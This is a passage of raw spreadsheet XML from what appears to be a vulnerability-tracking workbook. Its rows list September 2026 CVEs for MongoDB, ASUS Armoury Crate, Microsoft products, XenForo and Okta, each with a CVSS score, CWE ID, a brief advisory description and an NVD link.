server crash. An authenticated user with readWrite privileges can trigger this condition through specific concurrent text-search and index management operations, resulting in denial of service for all connected clients. This</t></is></c><c r="T1201" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82056</t></is></c></row><row r="1202"><c r="A1202" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1202" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1202" s="5" t="inlineStr"><is><t>CVE-2026-82063</t></is></c><c r="D1202" s="5" t="n"><v>6</v></c><c r="E1202" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1202" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1202" s="5" t="inlineStr" /><c r="H1202" s="5" t="n"><v>0.003</v></c><c r="I1202" s="5" t="inlineStr" /><c r="J1202" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1202" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1202" s="5" t="inlineStr" /><c r="M1202" s="5" t="inlineStr" /><c r="N1202" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1202" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1202" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1202" s="5" t="inlineStr" /><c r="R1202" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1202" s="5" t="inlineStr"><is><t>A use-after-free security issue in the cursor management component of MongoDB Server allows an authenticated user to cause a denial of service. Under specific timing conditions during cursor operations, a stale pointer to a freed resource may be retained and subsequently dereferenced during cursor cleanup, leading to a server process crash.</t></is></c><c r="T1202" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82063</t></is></c></row><row r="1203"><c r="A1203" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1203" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1203" s="5" t="inlineStr"><is><t>CVE-2026-16004</t></is></c><c r="D1203" s="5" t="n"><v>5.9</v></c><c r="E1203" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1203" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1203" s="5" t="inlineStr" /><c r="H1203" s="5" t="n"><v>0.001</v></c><c r="I1203" s="5" t="inlineStr" /><c r="J1203" s="5" t="inlineStr" /><c r="K1203" s="5" t="inlineStr" /><c r="L1203" s="5" t="inlineStr" /><c r="M1203" s="5" t="inlineStr" /><c r="N1203" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1203" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1203" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1203" s="5" t="inlineStr" /><c r="R1203" s="5" t="inlineStr"><is><t>CWE-782</t></is></c><c r="S1203" s="5" t="inlineStr"><is><t>Exposed IOCTL with Insufficient Access Control in Armoury Crate driver allows a local user to read and write arbitrary PCI/PCIe configuration space via crafted IOCTL requests by bypassing the driver's verification.
Refer to the '
Security Update for Armoury Crate App' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1203" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16004</t></is></c></row><row r="1204"><c r="A1204" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1204" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1204" s="5" t="inlineStr"><is><t>CVE-2026-69304</t></is></c><c r="D1204" s="5" t="n"><v>5.9</v></c><c r="E1204" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1204" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1204" s="5" t="inlineStr" /><c r="H1204" s="5" t="n"><v>0.008</v></c><c r="I1204" s="5" t="inlineStr" /><c r="J1204" s="5" t="inlineStr" /><c r="K1204" s="5" t="inlineStr" /><c r="L1204" s="5" t="inlineStr" /><c r="M1204" s="5" t="inlineStr" /><c r="N1204" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1204" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1204" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1204" s="5" t="inlineStr" /><c r="R1204" s="5" t="inlineStr"><is><t>CWE-409</t></is></c><c r="S1204" s="5" t="inlineStr"><is><t>Improper handling of highly compressed data (data amplification) in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1204" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69304</t></is></c></row><row r="1205"><c r="A1205" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1205" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1205" s="5" t="inlineStr"><is><t>CVE-2026-69382</t></is></c><c r="D1205" s="5" t="n"><v>5.9</v></c><c r="E1205" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1205" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1205" s="5" t="inlineStr" /><c r="H1205" s="5" t="n"><v>0.004</v></c><c r="I1205" s="5" t="inlineStr" /><c r="J1205" s="5" t="inlineStr" /><c r="K1205" s="5" t="inlineStr" /><c r="L1205" s="5" t="inlineStr" /><c r="M1205" s="5" t="inlineStr" /><c r="N1205" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1205" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1205" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1205" s="5" t="inlineStr" /><c r="R1205" s="5" t="inlineStr"><is><t>CWE-327</t></is></c><c r="S1205" s="5" t="inlineStr"><is><t>Use of a broken or risky cryptographic algorithm in Microsoft Exchange Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1205" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69382</t></is></c></row><row r="1206"><c r="A1206" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1206" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1206" s="5" t="inlineStr"><is><t>CVE-2026-70091</t></is></c><c r="D1206" s="5" t="n"><v>5.9</v></c><c r="E1206" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1206" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1206" s="5" t="inlineStr" /><c r="H1206" s="5" t="n"><v>0.007</v></c><c r="I1206" s="5" t="inlineStr" /><c r="J1206" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1206" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1206" s="5" t="inlineStr" /><c r="M1206" s="5" t="inlineStr" /><c r="N1206" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1206" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1206" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1206" s="5" t="inlineStr" /><c r="R1206" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S1206" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows DNS allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1206" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70091</t></is></c></row><row r="1207"><c r="A1207" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1207" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1207" s="5" t="inlineStr"><is><t>CVE-2026-72978</t></is></c><c r="D1207" s="5" t="n"><v>5.9</v></c><c r="E1207" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1207" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1207" s="5" t="inlineStr" /><c r="H1207" s="5" t="n"><v>0.008</v></c><c r="I1207" s="5" t="inlineStr" /><c r="J1207" s="5" t="inlineStr" /><c r="K1207" s="5" t="inlineStr" /><c r="L1207" s="5" t="inlineStr" /><c r="M1207" s="5" t="inlineStr" /><c r="N1207" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1207" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1207" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1207" s="5" t="inlineStr" /><c r="R1207" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S1207" s="5" t="inlineStr"><is><t>Allocation of resources without limits or throttling in Active Directory Federation Services (AD FS) allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1207" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72978</t></is></c></row><row r="1208"><c r="A1208" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1208" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1208" s="5" t="inlineStr"><is><t>CVE-2026-73310</t></is></c><c r="D1208" s="5" t="n"><v>5.9</v></c><c r="E1208" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1208" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1208" s="5" t="inlineStr" /><c r="H1208" s="5" t="n"><v>0.004</v></c><c r="I1208" s="5" t="inlineStr" /><c r="J1208" s="5" t="inlineStr" /><c r="K1208" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L1208" s="5" t="inlineStr" /><c r="M1208" s="5" t="inlineStr" /><c r="N1208" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1208" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1208" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1208" s="5" t="inlineStr" /><c r="R1208" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1208" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains an authorization flaw in the OAuth2 token endpoint that allows attackers controlling any allowlisted redirect URI to bypass redirect URI binding by submitting a different allowlisted URI than the one recorded at authorization time. Attackers can exchange an intercepted authorization code using a mismatched redirect URI to steal OAuth2 tokens from intercepted authorization flows.</t></is></c><c r="T1208" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73310</t></is></c></row><row r="1209"><c r="A1209" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1209" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1209" s="5" t="inlineStr"><is><t>CVE-2026-75809</t></is></c><c r="D1209" s="5" t="n"><v>5.9</v></c><c r="E1209" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1209" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1209" s="5" t="inlineStr" /><c r="H1209" s="5" t="n"><v>0.001</v></c><c r="I1209" s="5" t="inlineStr" /><c r="J1209" s="5" t="inlineStr" /><c r="K1209" s="5" t="inlineStr" /><c r="L1209" s="5" t="inlineStr" /><c r="M1209" s="5" t="inlineStr" /><c r="N1209" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1209" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1209" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1209" s="5" t="inlineStr" /><c r="R1209" s="5" t="inlineStr"><is><t>CWE-782</t></is></c><c r="S1209" s="5" t="inlineStr"><is><t>Exposed IOCTL with insufficient access control in ASUS Armoury Crate allows a local user to disclosure information and disabling device functionality by bypassing driver authentication and using IOCTLs to read from and write to PCIe configuration space.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1209" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75809</t></is></c></row><row r="1210"><c r="A1210" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1210" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1210" s="5" t="inlineStr"><is><t>CVE-2026-78620</t></is></c><c r="D1210" s="5" t="n"><v>5.9</v></c><c r="E1210" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1210" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1210" s="5" t="inlineStr" /><c r="H1210" s="5" t="n"><v>0.003</v></c><c r="I1210" s="5" t="inlineStr" /><c r="J1210" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1210" s="5" t="inlineStr" /><c r="L1210" s="5" t="inlineStr" /><c r="M1210" s="5" t="inlineStr" /><c r="N1210" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1210" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1210" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1210" s="5" t="inlineStr" /><c r="R1210" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="S1210" s="5" t="inlineStr"><is><t>The Okta Access Gateway Kerberos configuration handler does not validate file paths specified in event payloads before writing file contents. The path from the event payload is used directly as the write destination, resulting in files being written to unintended locations on the appliance filesystem.</t></is></c><c r="T1210" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78620</t></is></c></row><row r="1211"><c r="A1211" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1211" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1211" s="5" t="inlineStr"><is><t>CVE-2026-16005</t></is></c><c r="D1211" s="5" t="n"><v>5.8</v></c><c r="E1211" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1211" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1211" s="5" t="inlineStr" /><c r="H1211" s="5" t="n"><v>0.001</v></c><c r="I1211" s="5" t="inlineStr" /><c r="J1211" s="5" t="inlineStr" /><c r="K1211" s="5" t="inlineStr" /><c r="L1211" s="5" t="inlineStr" /><c r="M1211" s="5" t="inlineStr" /><c r="N1211" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1211" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1211" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1211" s="5" t="inlineStr" /><c r="R1211" s="5" t="inlineStr"><is><t>CWE-763</t></is></c><c r="S1211" s="5" t="inlineStr"><is><t>Release of Invalid Pointer or Reference in Armoury Crate driver allows a local user to free arbitrary memory via a crafted IOCTL request by bypassing the driver's verification, which can corrupt data structures and cause a system crash (BSOD).Refer to the '
Security Update for Armoury Crate App  ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1211" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16005</t></is></c></row><row r="1212"><c r="A1212" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1212" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1212" s="5" t="inlineStr"><is><t>CVE-2026-69559</t></is></c><c r="D1212" s="5" t="n"><v>5.8</v></c><c r="E1212" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1212" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1212" s="5" t="inlineStr" /><c r="H1212" s="5" t="n"><v>0.003</v></c><c r="I1212" s="5" t="inlineStr" /><c r="J1212" s="5" t="inlineStr" /><c r="K1212" s="5" t="inlineStr" /><c r="L1212" s="5" t="inlineStr" /><c r="M1212" s="5" t="inlineStr" /><c r="N1212" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1212" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1212" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1212" s="5" t="inlineStr" /><c r="R1212" s="5" t="inlineStr"><is><t>CWE-346</t></is></c><c r="S1212" s="5" t="inlineStr"><is><t>Origin validation error in Microsoft Teams for Android allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1212" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69559</t></is></c></row><row r="1213"><c r="A1213" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1213" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1213" s="5" t="inlineStr"><is><t>CVE-2026-75811</t></is></c><c r="D1213" s="5" t="n"><v>5.8</v></c><c r="E1213" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1213" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1213" s="5" t="inlineStr" /><c r="H1213" s="5" t="n"><v>0.001</v></c><c r="I1213" s="5" t="inlineStr" /><c r="J1213" s="5" t="inlineStr" /><c r="K1213" s="5" t="inlineStr" /><c r="L1213" s="5" t="inlineStr" /><c r="M1213" s="5" t="inlineStr" /><c r="N1213" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1213" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1213" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1213" s="5" t="inlineStr" /><c r="R1213" s="5" t="inlineStr"><is><t>CWE-1256</t></is></c><c r="S1213" s="5" t="inlineStr"><is><t>Improper Restriction of Software Interfaces to Hardware Features in ASUS Armoury Crate allows a local user to modify hardware configuration settings and potentially cause hardware damage by bypassing driver authentication and accessing critical model-specific registers.Refer to the '
Security Update for Armoury Crate App' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1213" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75811</t></is></c></row><row r="1214"><c r="A1214" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1214" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1214" s="5" t="inlineStr"><is><t>CVE-2026-16006</t></is></c><c r="D1214" s="5" t="n"><v>5.7</v></c><c r="E1214" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1214" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1214" s="5" t="inlineStr" /><c r="H1214" s="5" t="n"><v>0.001</v></c><c r="I1214" s="5" t="inlineStr" /><c r="J1214" s="5" t="inlineStr" /><c r="K1214" s="5" t="inlineStr" /><c r="L1214" s="5" t="inlineStr" /><c r="M1214" s="5" t="inlineStr" /><c r="N1214" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1214" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1214" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1214" s="5" t="inlineStr" /><c r="R1214" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1214" s="5" t="inlineStr"><is><t>Exposure of Sensitive System Information to an Unauthorized Control Sphere in Armoury Crate driver allows a local user to obtain kernel virtual addresses via a crafted IOCTL request by bypassing the driver's verification, potentially providing further insight into the kernel memory layout.Refer to the '
Security Update for Armoury Crate App  ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1214" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16006</t></is></c></row><row r="1215"><c r="A1215" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1215" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1215" s="5" t="inlineStr"><is><t>CVE-2026-18023</t></is></c><c r="D1215" s="5" t="n"><v>5.7</v></c><c r="E1215" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1215" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1215" s="5" t="inlineStr" /><c r="H1215" s="5" t="n"><v>0.001</v></c><c r="I1215" s="5" t="inlineStr" /><c r="J1215" s="5" t="inlineStr" /><c r="K1215" s="5" t="inlineStr" /><c r="L1215" s="5" t="inlineStr" /><c r="M1215" s="5" t="inlineStr" /><c r="N1215" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1215" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1215" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1215" s="5" t="inlineStr" /><c r="R1215" s="5" t="inlineStr"><is><t>CWE-226</t></is></c><c r="S1215" s="5" t="inlineStr"><is><t>Sensitive Information in Resource Not Removed Before Reuse in ASUS Armoury Crate driver allows a local user to disclose sensitive information from uninitialized memory via a crafted IOCTL request that bypasses the driver's security verification mechanism.
Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1215" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18023</t></is></c></row><row r="1216"><c r="A1216" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1216" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1216" s="5" t="inlineStr"><is><t>CVE-2026-68874</t></is></c><c r="D1216" s="5" t="n"><v>5.7</v></c><c r="E1216" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1216" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1216" s="5" t="inlineStr" /><c r="H1216" s="5" t="n"><v>0.008</v></c><c r="I1216" s="5" t="inlineStr" /><c r="J1216" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K121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16" s="5" t="inlineStr" /><c r="M1216" s="5" t="inlineStr" /><c r="N1216" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1216" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1216" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1216" s="5" t="inlineStr" /><c r="R1216" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1216" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Program Compatibility Assistant Service allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1216" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68874</t></is></c></row><row r="1217"><c r="A1217" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1217" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1217" s="5" t="inlineStr"><is><t>CVE-2026-69317</t></is></c><c r="D1217" s="5" t="n"><v>5.7</v></c><c r="E1217" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1217" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1217" s="5" t="inlineStr" /><c r="H1217" s="5" t="n"><v>0.008</v></c><c r="I1217" s="5" t="inlineStr" /><c r="J1217" s="5" t="inlineStr" /><c r="K1217" s="5" t="inlineStr" /><c r="L1217" s="5" t="inlineStr" /><c r="M1217" s="5" t="inlineStr" /><c r="N1217" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1217" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1217" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1217" s="5" t="inlineStr" /><c r="R1217" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1217" s="5" t="inlineStr"><is><t>Out-of-bounds read in Remote Desktop Client allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1217" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69317</t></is></c></row><row r="1218"><c r="A1218" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1218" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1218" s="5" t="inlineStr"><is><t>CVE-2026-69349</t></is></c><c r="D1218" s="5" t="n"><v>5.7</v></c><c r="E1218" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1218" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1218" s="5" t="inlineStr" /><c r="H1218" s="5" t="n"><v>0.008</v></c><c r="I1218" s="5" t="inlineStr" /><c r="J1218" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K121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18" s="5" t="inlineStr" /><c r="M1218" s="5" t="inlineStr" /><c r="N1218" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1218" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1218" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1218" s="5" t="inlineStr" /><c r="R1218" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1218" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Management Instrumentation allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1218" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69349</t></is></c></row><row r="1219"><c r="A1219" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1219" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1219" s="5" t="inlineStr"><is><t>CVE-2026-69372</t></is></c><c r="D1219" s="5" t="n"><v>5.7</v></c><c r="E1219" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1219" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1219" s="5" t="inlineStr" /><c r="H1219" s="5" t="n"><v>0.008</v></c><c r="I1219" s="5" t="inlineStr" /><c r="J1219" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1219" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1219" s="5" t="inlineStr" /><c r="M1219" s="5" t="inlineStr" /><c r="N1219" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1219" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1219" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1219" s="5" t="inlineStr" /><c r="R1219" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1219" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Network File System allows an authorized attacker to deny service over a network.</t></is></c><c r="T1219" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69372</t></is></c></row><row r="1220"><c r="A1220" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1220" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1220" s="5" t="inlineStr"><is><t>CVE-2026-69393</t></is></c><c r="D1220" s="5" t="n"><v>5.7</v></c><c r="E1220" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1220" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1220" s="5" t="inlineStr" /><c r="H1220" s="5" t="n"><v>0.008</v></c><c r="I1220" s="5" t="inlineStr" /><c r="J1220" s="5" t="inlineStr" /><c r="K1220" s="5" t="inlineStr" /><c r="L1220" s="5" t="inlineStr" /><c r="M1220" s="5" t="inlineStr" /><c r="N1220" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1220" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1220" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1220" s="5" t="inlineStr" /><c r="R1220" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1220" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1220" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69393</t></is></c></row><row r="1221"><c r="A1221" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1221" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1221" s="5" t="inlineStr"><is><t>CVE-2026-69405</t></is></c><c r="D1221" s="5" t="n"><v>5.7</v></c><c r="E1221" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1221" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1221" s="5" t="inlineStr" /><c r="H1221" s="5" t="n"><v>0.006</v></c><c r="I1221" s="5" t="inlineStr" /><c r="J1221" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1221" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1221" s="5" t="inlineStr" /><c r="M1221" s="5" t="inlineStr" /><c r="N1221" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1221" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1221" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1221" s="5" t="inlineStr" /><c r="R1221" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S1221" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows DHCP Server allows an authorized attacker to deny service over an adjacent network.</t></is></c><c r="T1221" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69405</t></is></c></row><row r="1222"><c r="A1222" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1222" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1222" s="5" t="inlineStr"><is><t>CVE-2026-69416</t></is></c><c r="D1222" 